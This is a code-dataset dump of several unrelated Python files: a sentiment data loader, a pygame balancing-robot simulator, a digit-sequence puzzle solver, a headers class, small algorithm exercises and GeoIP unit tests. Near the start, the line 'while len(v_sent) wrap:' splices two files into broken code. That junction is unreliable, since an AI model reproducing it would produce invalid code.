range(1,len(data),2):\n\t\t\tline = data[i].strip()\n\t\t\tlistfromline = line.split()\n\t\t\tlabel = list(map(int,listfromline))\n\t\t\tlabels.append(label)\n\t\treturn labels\n\n\tdef embed_mat(self):\n\t\tif self.domain == 'laptop':\n\t\t\t# model = Word2Vec.load('gensim_laptop')\n\t\t\tmodel = Word2Vec.load('./pkl/gensim_laptop_2014_'+str(self.emb_size))\n\t\telse:\n\t\t\t# model = Word2Vec.load('new_gensim_rest')\n\t\t\tmodel = Word2Vec.load('./pkl/gensim_rest_2016_2_'+str(self.emb_size))\n\t\tmat = np.random.uniform(-1,1,(self.vocab_size, self.emb_size))\n\t\tfor i in range(1,self.vocab_size):\n\t\t\tmat[i] = model[self.idx2word[i]]\n\t\treturn mat\n\n\tdef genel_mat(self):\n\t\tif self.domain == 'laptop':\n\t\t\tgen_file = './pkl/gen_laptop_2014_'+str(self.emb_size)+'.npy'\n\t\telse:\n\t\t\tgen_file = './pkl/gen_rest_2016_2_'+str(self.emb_size)+'.npy'\n\n\t\t# gen_file = './pkl/gen_laptop_2014.npy' if self.domain == 'laptop' else './pkl/gen_rest_2016_2.npy'\n\n\t\tif os.path.exists(gen_file):\n\t\t\treturn np.load(gen_file)\n\t\telse:\n\t\t\tmat = np.random.uniform(-1,1,(self.vocab_size, self.gen_size))\n\t\t\tfilename ='/media/wenjh/Ubuntu 16.0/Downloads/glove.6B/glove.6B.'+str(self.emb_size)+'d.txt' \n\t\t\t# fr = open('/media/wenjh/Ubuntu 16.0/Downloads/glove.6B/glove.6B.100d.txt')\n\t\t\tfr = open(filename)\n\t\t\tdata = fr.readlines()\n\t\t\tfor line in data:\n\t\t\t\tline = line.strip()\n\t\t\t\tlistfromline = line.split()\n\t\t\t\tword,vec = listfromline[0], listfromline[1:]\n\t\t\t\tif word in self.word2idx:\n\t\t\t\t\tindex = self.word2idx[word]\n\t\t\t\t\tmat[index] = np.array(list(map(float,vec))).astype(np.float32)\n\t\t\tnp.save(gen_file[:-4], mat)\n\t\t\treturn mat\n\n\n\tdef reset_pointer(self):\n\t\tself.pointer = 0\n\n\tdef random_point(self):\n\t\tidx = np.random.choice(self.train_size)\n\t\tbegin = idx \n\t\tend = idx+1\n\t\tindex = self.permutation[idx]\n\n\t\treturn self.train_sent[begin:end],\\\n\t\t\t\tself.train_sent_tag[begin:end],\\\n\t\t\t\tself.train_mask[begin:end],\\\n\t\t\t\tself.train_labels[begin:end],\\\n\t\t\t\tself.train_cat_labels[begin:end],\\\n\t\t\t\tself.train_tfidf[begin:end],\\\n\t\t\t\tindex\n\n\tdef __next__(self):\n\t\tbegin = self.pointer*self.batch_size\n\t\tend = (self.pointer+1)*self.batch_size\n\t\t# self.train_size = len(self.sent)\n\n\t\tif (self.pointer+1)*self.batch_size >= self.train_size:\n\t\t\tend = self.train_size\n\t\t\tself.pointer = 0\n\t\telse:\n\t\t\tself.pointer+=1\n\t\treturn self.train_sent[begin:end],\\\n\t\t\t\tself.train_sent_tag[begin:end],\\\n\t\t\t\tself.train_mask[begin:end],\\\n\t\t\t\tself.train_labels[begin:end],\\\n\t\t\t\tself.train_cat_labels[begin:end],\\\n\t\t\t\tself.train_tfidf[begin:end]\n\n\n\tdef val(self, sample_rate = 0.3):\n\t\t# test_size = self.train_size - 2000\n\t\tval_size = len(self.val_sent)\n\t\tsample_size = int(val_size*sample_rate)\n\n\t\tidx = np.random.choice(range(len(self.val_sent)), sample_size, replace = False)\n\n\n\t\tv_sent \t\t= []\n\t\tv_sent_tag \t= []\n\t\tv_mask \t\t= []\n\t\tv_labels \t= []\n\t\tv_c_labels \t= []\n\t\tv_c_masks \t= []\n\t\tv_tfidf \t= []\n\n\t\texists_dic = {}\n\n\t\tif sample_rate == 1:\n\t\t\t# print('\\n')\n\t\t\tindex = self.permutation[self.train_size:]\n\t\t\treturn [self.val_sent,\\\n\t\t\t\t\tself.val_sent_tag, \\\n\t\t\t\t\tself.val_mask, \\\n\t\t\t\t\tself.val_labels, \\\n\t\t\t\t\tself.val_cat_labels, \\\n\t\t\t\t\tindex,\\\n\t\t\t\t\tself.val_tfidf]\n\n\t\telse:\n\t\t\tindex = []\n\t\t\twhile len(v_sent) wrap:\n\t\t\t\ttoinsert = lines[ln][wrap:]\n\t\t\t\tlines.insert(ln+1,toinsert)\n\t\t\t\tleavebehind = lines[ln][:wrap]\n\t\t\t\tlines[ln] = leavebehind\n\t\t\tln += 1\n\t\t\tif ln == len(lines):\n\t\t\t\tbreak\n\t\treturn lines[-height:]\n\n","sub_path":"oldprogs/gui-window-attempt/shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"613811597","text":"\"\"\"\nSimple Balancing Robot Simulator\n\"\"\"\n#****************************************************************************\n# make sure starts in a desired screen position each time\nimport os\nos.environ['SDL_VIDEO_WINDOW_POS'] = \"%d,%d\" % (50,30)\n#------------------------------------------------------------\nimport pygame, sys\nimport random\nimport math # for trig\nfrom pygame.locals import *\n\n#---------------------------------------------------\n# to allow compatibility with both python 2 and 3\ntry:\n xrange\nexcept NameError:\n xrange = range\n#---------------------------------------------------\n# GRAPHICS CONSTANTS\nSCREEN_SIZE_X = 700\nSCREEN_SIZE_Y = 680\nWHEEL_R = 50 # size in pixels\nGROUND_Y = 600 # size in pixels\nTREE_SIZE_X = 100 # size in pixels\nTREE_SIZE_Y = 250 # size in pixels\n\nFPS = 40\n\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\n\n\n#PHYSICAL CONSTANTS\nFRAME_MASS = 25.0 # in Kg\nFRAME_I = 1.0/12*FRAME_MASS*(2**2) # moment of inertia of a uniform rod 2m long\nFRAME_L = 1. # in meters\n\nWORLD_SCALE = 100. # 1 meter = 100 pixels\nWORLD_ORIGIN = [50, GROUND_Y - WHEEL_R]\nTIME_dt = 0.001 # 1/iterations per second\nG = 9.8\nW = .1\n\n#-----------------------------------------------------------------------------\ndef realToGraphicCoord(realx,realy):\n graphicalx = realx*WORLD_SCALE + WORLD_ORIGIN[0]\n graphicaly = -realy*WORLD_SCALE + WORLD_ORIGIN[1]\n return [graphicalx, graphicaly]\n \n#-----------------------------------------------------------------------------\nclass PObject():\n '''\n CLASS TO MODEL PHYSICAL OBJECT MOTION IN 2D. Does not include gravity.\n '''\n def __init__(self, mass=1., I=1., dt=TIME_dt):\n self.mass = mass\n self.I = I\n self.dt = dt\n\n self.x = 0.0\n self.y = 0.0\n self.theta = 0.0\n self.xdot = 0.0\n self.ydot = 0.0\n self.thetadot = 0.0\n \n def Update(self, forcex, forcey, torque):\n # F = ma; a = F/m\n self.xdot += forcex/self.mass*self.dt\n self.x += self.xdot*self.dt\n\n self.ydot += forcey/self.mass*self.dt - G*self.dt\n self.y += self.ydot*self.dt\n\n self.thetadot += torque/self.I*self.dt\n self.theta += self.thetadot*self.dt\n \n \n#-----------------------------------------------------------------------------\nclass Ball(pygame.sprite.Sprite):\n def __init__(self):\n \"\"\" Set up the robot on creation. \"\"\"\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface([5, 5])\n self.image.fill(BLUE)\n self.rect = self.image.get_rect()\n self.pobj = PObject()\n self.pobj.x = 5 # 1 meter\n self.pobj.y = 4.9 #\n self.pobj.xdot = 0 \n self.pobj.ydot = 0 # 4.9 m/sec, should bounce with a period of 1 sec\n self.rect.center = (self.pobj.x, self.pobj.y)\n\n def update(self):\n \"\"\" the xpos variable should have been prior set. \"\"\"\n self.rect = self.image.get_rect()\n self.rect.center = (realToGraphicCoord(self.pobj.x, self.pobj.y))\n screen.blit(self.image, (self.rect.x, self.rect.y))\n \n def pupdate(self):\n self.pobj.Update(0,0,0)\n if((self.pobj.y < 0) and (self.pobj.ydot < 0)):\n self.pobj.y = 0\n self.pobj.ydot = -self.pobj.ydot\n \n#-----------------------------------------------------------------------------\nclass WheelTest(pygame.sprite.Sprite):\n '''\n CLASS TO DISPLAY A WHEEL\n Setx(x) - function to set the xposition (__xpos) of the wheel, all other\n graphical state variables are calculated from __xpos\n '''\n def __init__(self):\n \"\"\" Set up the robot on creation. \"\"\"\n pygame.sprite.Sprite.__init__(self)\n self.imageMaster = pygame.image.load(\"wheel.png\").convert_alpha()\n self.imageMaster = pygame.transform.scale(self.imageMaster, \n (WHEEL_R * 2, WHEEL_R * 2))\n self.image = self.imageMaster\n self.rect = self.image.get_rect()\n self.xpos = 70 \n self.ypos = GROUND_Y - WHEEL_R #for center\n self.angle = 0\n self.rect.center = (self.xpos, self.ypos)\n self.pobj = PObject()\n\n def pupdate(self):\n self.pobj.Update(0,0,10) \n\n def update(self):\n \"\"\" the xpos variable should have been prior set. \"\"\"\n self.angle = self.pobj.theta\n self.image = pygame.transform.rotate(self.imageMaster, \n -self.angle*180/math.pi)\n self.rect = self.image.get_rect()\n self.rect.center = (self.xpos, self.ypos)\n screen.blit(self.image, (self.rect.x, self.rect.y))\n \n def Setx(x):\n self.xpos = x\n\n\n#-----------------------------------------------------------------------------\nclass Wheel(pygame.sprite.Sprite):\n '''\n CLASS TO DISPLAY A WHEEL\n Setx(x) - function to set the xposition (__xpos) of the wheel, all other\n graphical state variables are calculated from __xpos. In \n other words, the rotation is set based on how much it should\n have rolled to reach the given _xpos.\n The wheel is placed on the ground (GROUND_Y).\n '''\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.imageMaster = pygame.image.load(\"wheel.png\").convert_alpha()\n self.imageMaster = pygame.transform.scale(self.imageMaster, \n (WHEEL_R * 2, WHEEL_R * 2))\n self.image = self.imageMaster\n self.rect = self.image.get_rect()\n self.xpos = 0 # center x; set externally\n self.ypos = GROUND_Y - WHEEL_R # center y; never changed\n self.angle = 0 # rotation in radians; calculated each update\n self.rect.center = (self.xpos, self.ypos)\n\n def update(self):\n \"\"\" the xpos variable should have been prior set. \"\"\"\n self.angle = (self.xpos/WHEEL_R)\n self.image = pygame.transform.rotate(self.imageMaster, \n -self.angle*180/math.pi)\n self.rect = self.image.get_rect()\n self.rect.center = (self.xpos, self.ypos)\n screen.blit(self.image, (self.rect.x, self.rect.y))\n \n def Setx(x):\n self.xpos = x\n\n#-----------------------------------------------------------------------------\nclass Frame(pygame.sprite.Sprite):\n '''\n CLASS TO DISPLAY ROBOT FRAME (TREE PART)\n '''\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.imageMaster = pygame.image.load(\"tree.png\").convert_alpha()\n self.imageMaster = pygame.transform.scale(self.imageMaster, \n (TREE_SIZE_X,TREE_SIZE_Y))\n self.angle = 0\n self.image = pygame.transform.rotate(self.imageMaster, \n -self.angle*180/math.pi)\n self.rect = self.image.get_rect()\n self.xpos = 0 #for center of mass\n self.ypos = GROUND_Y - WHEEL_R - \\\n TREE_SIZE_Y/2*math.cos(self.angle)\n self.rect.center = (self.xpos, self.ypos)\n\n\n def update(self):\n \"\"\" Update the player's position. \"\"\"\n # Get the current mouse position. This returns the position\n # as a list of two numbers.\n # Set the player x position to the mouse x position\n self.image = pygame.transform.rotate(self.imageMaster, \n -self.angle*180/math.pi)\n self.rect = self.image.get_rect()\n self.ypos = GROUND_Y - WHEEL_R - \\\n TREE_SIZE_Y/2*math.cos(self.angle)\n self.rect.center = (self.xpos, self.ypos)\n screen.blit(self.image, (self.rect.x, self.rect.y))\n \n def Setx(x):\n self.xpos = x\n\n\n#-----------------------------------------------------------------------------\nclass Robot(pygame.sprite.Sprite):\n def __init__(self):\n \"\"\" Set up the robot on creation. \"\"\"\n\n # Mass = 25Kg, \n # I is equivalent to a uniform rod of height 2m (1/12*M*L**2)\n self.pobj = PObject(FRAME_MASS, FRAME_I, TIME_dt)\n self.pobj.theta = 0.1\n self.pobj.x = 2\n self.pobj.y = FRAME_L*math.cos(self.pobj.theta)\n\n self.wheel = Wheel()\n self.frame = Frame()\n \n self.frame.xpos, y = realToGraphicCoord(self.pobj.x, self.pobj.y)\n self.wheel.xpos = self.frame.xpos - \\\n TREE_SIZE_Y/2*math.sin(self.pobj.theta)\n self.frame.angle = self.pobj.theta\n \n def pupdate(self):\n numer = -self.pobj.mass*FRAME_L*math.cos(self.pobj.theta)* \\\n ((self.pobj.thetadot)**2) + self.pobj.mass*G\n denom = 1 + self.pobj.mass*(FRAME_L**2)* \\\n (math.sin(self.pobj.theta)**2)/FRAME_I\n forcey = numer/denom\n torque = forcey*FRAME_L*math.sin(self.pobj.theta) \n #torque = self.pobj.mass*G*math.sin(self.pobj.theta/180*math.pi) \n self.pobj.Update(0, forcey, torque)\n self.frame.xpos, y = realToGraphicCoord(self.pobj.x, self.pobj.y)\n self.wheel.xpos = self.frame.xpos - \\\n TREE_SIZE_Y/2*math.sin(self.pobj.theta)\n self.frame.angle = self.pobj.theta\n\n#-----------------------------------------------------------------------------\nclass RobotBalanced(pygame.sprite.Sprite):\n def __init__(self):\n \"\"\" Set up the robot on creation. \"\"\"\n\n # Mass = 25Kg, \n # I is equivalent to a uniform rod of height 2m (1/12*M*L**2)\n self.pobj = PObject(FRAME_MASS, FRAME_I, TIME_dt)\n self.pobj.theta = 1\n self.pobj.x = 5\n self.pobj.xdot = 0 # remove\n self.pobj.y = FRAME_L*math.cos(self.pobj.theta)\n\n self.wheel = Wheel()\n self.frame = Frame()\n \n self.frame.xpos, y = realToGraphicCoord(self.pobj.x, self.pobj.y)\n self.wheel.xpos = self.frame.xpos - \\\n TREE_SIZE_Y/2*math.sin(self.pobj.theta)\n self.frame.angle = self.pobj.theta\n \n def pupdate(self):\n numer = -self.pobj.mass*FRAME_L*math.cos(self.pobj.theta)* \\\n ((self.pobj.thetadot)**2) + self.pobj.mass*G\n denom = 1 + self.pobj.mass*(FRAME_L**2)* \\\n (math.sin(self.pobj.theta)**2)/FRAME_I\n forcey = numer/denom\n torquey = forcey*FRAME_L*math.sin(self.pobj.theta) \n\n theta_delayed = self.pobj.theta #placeholder for later implemented delay\n thetadot_delayed = self.pobj.thetadot #placeholder for later implemented delay\n\n numer = self.pobj.mass*G*FRAME_L*math.sin(theta_delayed) - \\\n self.pobj.mass*(FRAME_L**2)*math.sin(theta_delayed)* \\\n math.cos(theta_delayed)*(thetadot_delayed**2) + \\\n (2*W*thetadot_delayed +W*theta_delayed)* \\\n (self.pobj.I + \n self.pobj.mass*(FRAME_L**2)*(math.sin(theta_delayed)**2))\n denom = 1 + FRAME_L*math.cos(theta_delayed)/(WHEEL_R/100.)\n torqueMotor = -numer/denom\n\n forcex = -torqueMotor / (WHEEL_R/100.)\n torquex = -forcex * FRAME_L * math.cos(self.pobj.theta)\n \n torque = torquex + torquey + torqueMotor\n #torque = self.pobj.mass*G*math.sin(self.pobj.theta/180*math.pi) \n self.pobj.Update(forcex, forcey, torque)\n self.frame.xpos, y = realToGraphicCoord(self.pobj.x, self.pobj.y)\n self.wheel.xpos = self.frame.xpos - \\\n TREE_SIZE_Y/2*math.sin(self.pobj.theta)\n self.frame.angle = self.pobj.theta\n \n#-----------------------------------------------------------------------------\nclass RobotDoubleBalanced(pygame.sprite.Sprite):\n def __init__(self):\n \"\"\" Set up the robot on creation. \"\"\"\n\n # Mass = 25Kg, \n # I is equivalent to a uniform rod of height 2m (1/12*M*L**2)\n self.pobj = PObject(FRAME_MASS, FRAME_I, TIME_dt)\n self.pobj.theta = -.2\n self.pobj.x = 1\n self.pobj.xdot = 2# initial velocity - remove\n self.pobj.y = FRAME_L*math.cos(self.pobj.theta)\n\n self.wheel = Wheel()\n self.frame = Frame()\n \n self.frame.xpos, y = realToGraphicCoord(self.pobj.x, self.pobj.y)\n self.wheel.xpos = self.frame.xpos - \\\n TREE_SIZE_Y/2*math.sin(self.pobj.theta)\n self.frame.angle = self.pobj.theta\n \n self.thetaTarget = 0.0\n self.xTarget = 3.\n \n self.torque = 0.\n self.torqueMotor = 0.\n self.torquex = 0.\n self.torquey = 0.\n self.forcex = 0.\n self.forcey = 0.\n \n def pupdate(self):\n xerror = self.pobj.x - self.xTarget\n #if(xerror > .1):\n # self.thetaTarget = -0.01\n #elif(xerror < .1):\n # self.thetaTarget = 0.01\n #self.thetaTarget = -math.atan(0.001*xerror) #- math.atan(0.05*self.pobj.xdot)\n #self.thetaTarget = 0\n self.xTarget = (pygame.mouse.get_pos()[0] - WORLD_ORIGIN[0])/WORLD_SCALE\n numer = -self.pobj.mass*FRAME_L*math.cos(self.pobj.theta)* \\\n ((self.pobj.thetadot)**2) + self.pobj.mass*G\n denom = 1 + self.pobj.mass*(FRAME_L**2)* \\\n (math.sin(self.pobj.theta)**2)/FRAME_I\n self.forcey = numer/denom\n self.torquey = self.forcey*FRAME_L*math.sin(self.pobj.theta) \n\n theta_delayed = self.pobj.theta #placeholder for later implemented delay\n thetadot_delayed = self.pobj.thetadot #placeholder for later implemented delay\n \n thetaError = theta_delayed - self.thetaTarget \n\n numer = self.pobj.mass*G*FRAME_L*math.sin(thetaError) - \\\n self.pobj.mass*(FRAME_L**2)*math.sin(thetaError)* \\\n math.cos(thetaError)*(thetadot_delayed**2) + \\\n (2*W*thetadot_delayed +W*thetaError)* \\\n (self.pobj.I + \\\n self.pobj.mass*(FRAME_L**2)*(math.sin(thetaError)**2))\n denom = 1 + FRAME_L*math.cos(thetaError)/(WHEEL_R/100.)\n self.torqueMotor = -numer/denom + \\\n 0.08*(-xerror) - 0.4*self.pobj.xdot\n\n self.forcex = -self.torqueMotor / (WHEEL_R/100.)\n self.torquex = -self.forcex * FRAME_L * math.cos(self.pobj.theta)\n \n self.torque = self.torquex + self.torquey + self.torqueMotor\n #torque = self.pobj.mass*G*math.sin(self.pobj.theta/180*math.pi) \n self.pobj.Update(self.forcex, self.forcey, self.torque)\n self.frame.xpos, y = realToGraphicCoord(self.pobj.x, self.pobj.y)\n self.wheel.xpos = self.frame.xpos - \\\n TREE_SIZE_Y/2*math.sin(self.pobj.theta)\n self.frame.angle = self.pobj.theta\n \n def dump(self):\n print(self.torqueMotor),\n print(self.torquex),\n print(self.torquey),\n print(self.torque),\n print(self.forcex),\n print(self.forcey)\n \n\n#****************************************************************************\n# --- Create the window\n# Initialize Pygame\npygame.init()\n\n\n# Set the height and width of the screen\nscreen = pygame.display.set_mode([SCREEN_SIZE_X, SCREEN_SIZE_Y])\n\n# set up fonts\nbasicFont = pygame.font.SysFont(None, 48)\ntext = basicFont.render('YOU SUCK!', True, WHITE, BLUE)\ntextRect = text.get_rect()\ntextRect.centerx = screen.get_rect().centerx\ntextRect.centery = screen.get_rect().centery\n\n#background_image = pygame.image.load(\"jungle.jpg\").convert()\n\n# --- Sprite lists\n# This is a list of every sprite. All blocks and the player block as well.\nall_sprites_list = pygame.sprite.Group()\n\n# List of each block in the game\nblock_list = pygame.sprite.Group()\n\n# List of each bullet\nbullet_list = pygame.sprite.Group()\n\n# Instantiate sprites\nball = Ball()\nall_sprites_list.add(ball)\n\n#wheelTest = WheelTest()\n#all_sprites_list.add(wheelTest)\n\n#robot = Robot()\n#all_sprites_list.add(robot.frame)\n#all_sprites_list.add(robot.wheel)\n#robotBalanced = RobotBalanced()\n#all_sprites_list.add(robotBalanced.frame)\n#all_sprites_list.add(robotBalanced.wheel)\nrobotDoubleBalanced = RobotDoubleBalanced()\nall_sprites_list.add(robotDoubleBalanced.frame)\nall_sprites_list.add(robotDoubleBalanced.wheel)\n\n\n#Loop until the user clicks the close button.\ndone = False\n# Used to manage how fast the screen updates\nclock = pygame.time.Clock()\nscore = 0\n\n# -------- Main Program Loop -----------\nwhile not done:\n # --- Event Processing\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n elif event.type == pygame.MOUSEBUTTONDOWN:\n # Fire a bullet if the user clicks the mouse button\n score = score + 1\n \n # Physics inner loop \n for i in xrange(1,int(1/TIME_dt/FPS)):\n ball.pupdate()\n #robot.pupdate() \n #robotBalanced.pupdate() \n robotDoubleBalanced.pupdate() \n #wheelTest.pupdate()\n # --- Game logic\n # Call the update() method on all the sprites\n all_sprites_list.update()\n robotDoubleBalanced.dump()\n \n # --- Draw a frame\n # Clear the screen\n screen.fill(WHITE)\n #screen.blit(background_image, [0,0])\n pygame.draw.lines(screen, BLACK, False, [(0,GROUND_Y), (SCREEN_SIZE_X,GROUND_Y)], 1)\n\n # Draw all the spites\n all_sprites_list.draw(screen) \n \n # Go ahead and update the screen with what we've drawn.\n pygame.display.flip()\n \n # --- Limit to 20 frames per second\n clock.tick(FPS)\n\nscreen.blit(text, textRect)\npygame.display.update()\npygame.time.delay(500)\n\npygame.quit()","sub_path":"pc/simulator/pyPhysicsSim/pyPhysicsSim.py","file_name":"pyPhysicsSim.py","file_ext":"py","file_size_in_byte":16934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"642581150","text":"\"\"\"\n2. Бесконечная последовательность\nВозьмём бесконечную цифровую последовательность, образованную склеиванием последовательных положительных чисел: \nS = 123456789101112131415...\nОпределите первое вхождение заданной подпоследовательности A в бесконечной последовательности S (нумерация начинается с 1).\n\nПрограмма должна читать данные из stdin и выводить ответы в stdout.\n\nПример входных данных (по одной подпоследовательности на строку, максимальная длина подпоследовательности — 50 символов):\n6789\n111\n\nПример выходных данных:\n6\n12\n\"\"\"\n\"\"\"\nЗАМЕТКИ.\n1. Вхождение числа в бесконечную последовательность определяется количеством цифр в этом числе. Если рассматривать \nсаму последовательность - получается следующее - первые 9 чисел (1-9) содержат по 1 цифре, следущие 90 чисел (10-99) - \n- по 2 цифры и т.д. Значит, для нахождения первого вхождения необходимо определить в числе количество единиц, десяток, \nсотен, и т.д., после чего домножить величину на соответствующее количество цифр.\n2. Генерация последовательности должна выполняться возможными комбинациями входных данных.\n3. Возможные варианты последовательности:\n \n # Первая цифра - 9\n 79, 80, 81, 82 --> 98081\n 89, 90, 91, 92 --> 99091\n 129, 130, 131 --> 9130131\n 1859, 1860, 1861 --> 918601861\n \n # Первая цифра - 0\n 20, 21, 22, 23 --> 02122\n 1250, 1251, 1252 --> 012511252\n\"\"\"\n\n\ndef find_first_ins(number):\n first_ins = 0\n temp = 0\n temporary_numb = 0\n for i in range(len(str(number))-1):\n temporary_numb += 9*(10**i)\n temp += 9*(10**i)*(i+1)\n val = i\n temp += (val+2)*(number - temporary_numb-1)+1\n\n print('по-умному - ' + str(temp))\n\ndef generate_seq(number=''):\n number_seq = 1\n final_string = ''\n while True:\n final_string += str(number_seq)\n number_seq += 1\n if number in final_string:\n # print(final_string)\n print('в тупую - ' + str(final_string.find(str(number)) + 1))\n return final_string.find(str(number))+1\n\nx = int(input())\nfind_first_ins(x)\ngenerate_seq(str(x))\n\n","sub_path":"TASK_2.py","file_name":"TASK_2.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"376660520","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\nfrom tachyonic.neutrino.utils.general import is_byte_string\nlog = logging.getLogger(__name__)\n\n\nclass Headers(object):\n def __init__(self,request=True):\n self.data = {}\n self.request = request\n\n def __setitem__(self, key, value):\n key = str(key).lower()\n if self.request is True:\n key = key.replace('-','_')\n self.data[key] = value\n\n def __getitem__(self, key):\n key = str(key).lower()\n if self.request is True:\n key = key.replace('-','_')\n if key in self.data:\n return self.get(key)\n else:\n raise KeyError(key)\n\n def __delitem__(self, key):\n try:\n key = str(key).lower()\n if self.request is True:\n key = key.replace('-','_')\n del self.data[key]\n except KeyError:\n pass\n\n def __contains__(self, key):\n key = str(key).lower()\n if self.request is True:\n key = key.replace('-','_')\n return key in self.data\n\n def __iter__(self):\n return iter(self.data)\n\n def __len__(self):\n return len(self.data)\n\n def __repr__(self):\n return repr(self.data)\n\n def __str__(self):\n return str(self.data)\n\n def update(self, headers):\n self.data.update(headers)\n\n def get(self, key, default=None):\n try:\n key = str(key).lower()\n if self.request is True:\n key = key.replace('-','_')\n if is_byte_string(self.data[key]):\n return self.data[key]\n else:\n return str(self.data[key]).encode('utf-8')\n except KeyError:\n return default\n","sub_path":"tachyonic/neutrino/headers.py","file_name":"headers.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"232687989","text":"class Solution:\n def islandPerimeter(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n ans = 0\n for i,row in enumerate(grid):\n for j,val in enumerate(row):\n if val:\n ans += 4\n if i>0 and grid[i-1][j]: ans -= 2\n if j>0 and grid[i][j-1]: ans -= 2\n return ans\nval = [[0,1,0,0],[1,1,1,0],[0,1,0,0],[1,1,0,0]]\nprint(Solution().islandPerimeter(val))","sub_path":"463. Island Perimeter.py","file_name":"463. Island Perimeter.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"187224720","text":"import sys\nex = input()\ncount = 0\nans=\"\"\nfor i in range(len(ex)-1,-1,-1):\n if(ex[i] == '<'):\n count += 1\n elif(count > 0):\n count -= 1\n else:\n ans += ex[i]\n\n\nprint(ans[::-1])\n","sub_path":"Kattis/backspace.py","file_name":"backspace.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"263135385","text":"# First Idea:\n# - Regex replace ' ' with '%20'\n\n# O(n)\nimport re\ndef URLify(string):\n return re.sub(' ', \"%20\", string)\n\n\n# Second Idea:\n# - Iterate through and replace ' ' with '%20'\n\n# O(n)\ndef URLify_2(string):\n out = []\n for letter in string:\n if letter == ' ':\n out.append('%20')\n else:\n out.append(letter)\n return ''.join(out)\n\n\n\na = \"this is a test\"\nb = \"this is test\"\n\nprint(URLify(a))\nprint(URLify(b))\n\nprint(URLify_2(a))\nprint(URLify_2(b))","sub_path":"CTCI-6th-Edition/chapter-01/1.3-URLify.py","file_name":"1.3-URLify.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"470338768","text":"# --====================================================--\n# Threat Information Management System (T.I.M.S.)\n# Download Agent\n# Group 2 - Fall 2018\n# Darrell Miller, Doug Peck, Raymond Schmalzl, Trung Nguyen\n#\n# --====================================================--\n#\n# Unit Tests for GeoIP Enrichment Class\n# \nimport unittest\nimport os\nimport geoip2\nfrom shutil import copyfile\nfrom DataEnricher import *\nfrom UnitTest import Test_DataEnricher\n\nclass Test_LocateGeoIP(Test_DataEnricher):\t\n\n\t# Test DB Location Adjustment Methods\n\tdef test_dbloc_updates(self):\n\t\t# Pull Starting Locations\n\t\tasnDBloc = self.enrichObj.asnDBloc \n\t\tcityDBloc = self.enrichObj.cityDBloc \n\t\tcountryDBloc = self.enrichObj.countryDBloc\n\t\t# Change Locations\n\t\tself.enrichObj.set_asnDBloc('test')\n\t\tself.enrichObj.set_cityDBloc('test')\n\t\tself.enrichObj.set_countryDBloc('test')\n\t\t# Test for change\n\t\tself.assertNotEqual(self.enrichObj.asnDBloc,asnDBloc)\n\t\tself.assertNotEqual(self.enrichObj.cityDBloc,cityDBloc)\n\t\tself.assertNotEqual(self.enrichObj.cityDBloc,cityDBloc)\n\n\t# # Test the socket response from the Host IP modules\n\t# def test_searchASN(self):\n\t# \t# Open the Reader\n\t# \tself.enrichObj.reader = geoip2.database.Reader(self.enrichObj.asnDBloc)\n\t# \t# Pull Data\n\t# \tself.enrichObj.extractFromDB()\n\t# \t# Reduce the number of threats for speed\n\t# \tself.prune_threats()\n\t# \t# Try searching for ASN Information\n\t# \tcount = 0\n\t# \tfor item in self.enrichObj.recordedThreats:\n\t# \t\tip = self.enrichObj.searchASN(item)\n\t# \t\tif not \" - Failure\" in ip[0]:\n\t# \t\t\tcount += 1\n\t# \t#Close the Reader\n\t# \tself.enrichObj.reader.close()\n\t# \t# Check for failure\n\t# \tself.assertTrue(count > 0)\n\n\t# # Test the socket response from the Host IP modules\n\t# def test_searchCity(self):\n\t# \t# Open the Reader\n\t# \tself.enrichObj.reader = geoip2.database.Reader(self.enrichObj.cityDBloc)\n\t# \t# Pull Data\n\t# \tself.enrichObj.extractFromDB()\n\t# \t# Reduce the number of threats for speed\n\t# \tself.prune_threats()\n\t# \t# Try searching for City Information\n\t# \tcount = 0\n\t# \tfor item in self.enrichObj.recordedThreats:\n\t# \t\tip = self.enrichObj.searchASN(item)\n\t# \t\tif not \" - Failure\" in ip[0]:\n\t# \t\t\tcount += 1\n\t# \t#Close the Reader\n\t# \tself.enrichObj.reader.close()\n\t# \t# Check for failure\n\t# \tself.assertTrue(count > 0)\n\n\t# Test the HostIP Modules Enrichment Method\n\tdef test_GeoIP_enrichment(self):\n\t\t# Pull Data\n\t\tself.enrichObj.extractFromDB()\n\t\t# Reduce the number of threats for speed\n\t\tself.prune_threats()\n\t\t# Empty Existing Field\n\t\tself.empty_key('enriched')\n\t\t# Enrich Data\n\t\tself.enrichObj.enrichData()\n\t\t# Count the number of properly enriched entires\n\t\tcount = 0\n\t\tfor item in self.enrichObj.recordedThreats:\n\t\t\tif self.enrichObj.recordedThreats[item]['enriched'] == 1:\n\t\t\t\tcount += 1\n\t\t# Check tha every entry was updates\n\t\tself.assertEqual(len(self.enrichObj.recordedThreats),count)\n\n\t#Start by creating an export instance \n\tdef setUp(self):\n\t\tself.enrichObj = LocateGeoIP()\n\t\tself.enrichObj.sqlString = \"SELECT * FROM 'RecordedThreatsDB' 